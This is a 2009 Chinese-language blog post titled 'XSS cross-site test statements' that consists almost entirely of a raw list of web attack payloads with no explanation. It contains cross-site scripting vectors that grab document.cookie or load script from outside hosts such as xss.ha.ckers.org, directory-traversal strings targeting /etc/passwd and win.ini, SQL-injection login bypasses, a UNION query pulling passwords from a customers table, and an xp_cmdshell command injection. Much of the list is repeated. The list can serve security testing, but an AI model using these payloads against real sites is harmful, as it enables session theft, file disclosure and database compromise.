XSS跨站测试语句

2009年1月9日 | 标签: XSS

'><script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
<script>alert('XSS')</script>
<img src="javascript:alert('XSS')">
%0a%0a<script>alert("Vulnerable")</script>.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
<script>alert('Vulnerable');</script>
<script>alert('Vulnerable')</script>
?sql_debug=1
a%5c.aspx
a.jsp/<script>alert('Vulnerable')</script>
a/
a?<script>alert('Vulnerable')</script>
"><script>alert('Vulnerable')</script>
';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:inetpubwwwroot?.txt'--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
................windowssystem.ini
................windowssystem.ini
'';!--"<xss>=&{()}
<img SRC="javascript:alert('XSS');">
<img SRC=javascript:alert('XSS')>
<img SRC=javascript:alert('XSS')>
<img SRC=javascript:alert("XSS")>
<img SRC=javascript:alert('XSS')>
<img SRC=javascript:alert('XSS')>
<img SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<img SRC="jav ascript:alert('XSS');">
<img SRC="jav ascript:alert('XSS');">
<img SRC="jav ascript:alert('XSS');">
"<img SRC=java�script:alert("XSS")>";' > out
<img SRC=" javascript:alert('XSS');">
<script>a=/XSS/alert(a.source)</script>
<body BACKGROUND="javascript:alert('XSS')">
<body ONLOAD=alert('XSS')>
<img DYNSRC="javascript:alert('XSS')">
<img LOWSRC="javascript:alert('XSS')">
<bgsound SRC="javascript:alert('XSS');">
<br size="&{alert('XSS')}">
<layer SRC="http://xss.ha.ckers.org/a.js";></layer>
<link REL="stylesheet" HREF="javascript:alert('XSS');">
<img SRC='vbscript:msgbox("XSS")'>
<img SRC="mocha:[code]">
<img SRC="livescript:[code]">
<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<iframe SRC=javascript:alert('XSS')></iframe>
<frameset><frame SRC=javascript:alert('XSS')></frame></frameset>
<table BACKGROUND="javascript:alert('XSS')">
<div STYLE="background-image: url(javascript:alert('XSS'))">
<div STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html';);">
<div STYLE="width: expression(alert('XSS'));">
<style>@import'javascript:alert("XSS")';</style>
<img STYLE='xss:expression(alert("XSS"))'>
<style TYPE="text/javascript">alert('XSS');</style>
<style TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</style><a CLASS=XSS></a>
<style type="text/css">BODY{background:url("javascript:alert('XSS')")}</style>
<base HREF="javascript:alert('XSS');//">
getURL("javascript:alert('XSS')")
a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
<xml SRC="javascript:alert('XSS');">
"> <body ONLOAD="a();"><script>function a(){alert('XSS');}</script><"
<script SRC="/article/UploadFiles/200608/20060827171609376.jpg"></script>
<img SRC="javascript:alert('XSS')"
<!--#exec cmd="/bin/echo '<script SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></script>'"-->
<img SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";>
<script a=">" SRC="http://xss.ha.ckers.org/a.js";></script>
<script =">" SRC="http://xss.ha.ckers.org/a.js";></script>
<script a=">" '' SRC="http://xss.ha.ckers.org/a.js";></script>
<script "a='>'" SRC="http://xss.ha.ckers.org/a.js";></script>
<script>document.write("<scri");</script>PT SRC="http://xss.ha.ckers.org/a.js";></script>
<a HREF=http://www.gohttp://www.google.com/ogle.com/>;link</a>
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

100

101

102

103

104

105

106

107

'><script>alert(document.cookie)</script>

='><script>alert(document.cookie)</script>

%3Cscript%3Ealert('XSS')%3C/script%3E

%0a%0a<script>alert("Vulnerable")</script>.jsp

%22%3cscript%3ealert(%22xss%22)%3c/script%3e

%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini

%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html

%3f.jsp

?sql_debug=1

a%5c.aspx

a.jsp/<script>alert('Vulnerable')</script>

a?<script>alert('Vulnerable')</script>

"><script>alert('Vulnerable')</script>

';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:inetpubwwwroot?.txt'--&&

%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

%3Cscript%3Ealert(document. domain);%3C/script%3E&

%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=

1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=

../../../../../../../../etc/passwd

................windowssystem.ini

'';!--"<xss>=&{()}

"<img SRC=javascript:alert("XSS")>";' > out

getURL("javascript:alert('XSS')")

a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);

"> <body ONLOAD="a();"><script>function a(){alert('XSS');}</script><"

<img SRC="javascript:alert('XSS')"

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

发表评论 | Trackback

目前还没有任何评论.

« YouTube的XSS！ feedsky XSS跨站漏洞 »

置顶

SpookZanG

XSS跨站测试语句

分类目录

链接表

文章归档

标签

功能